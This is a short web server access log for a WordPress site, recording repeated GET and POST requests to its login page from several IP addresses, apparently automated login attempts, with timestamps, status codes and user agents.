159.65.10.179 - - [25/Apr/2026:00:44:40 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:44:52 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
45.92.229.210 - - [25/Apr/2026:00:46:18 +0700] "POST /wp-login.php HTTP/1.1" 200 7107 "-" "Mozilla/5.0"
159.65.10.179 - - [25/Apr/2026:00:45:42 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:45:54 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
188.241.62.83 - - [25/Apr/2026:00:47:38 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
188.241.62.83 - - [25/Apr/2026:00:47:41 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:46:44 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:46:56 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
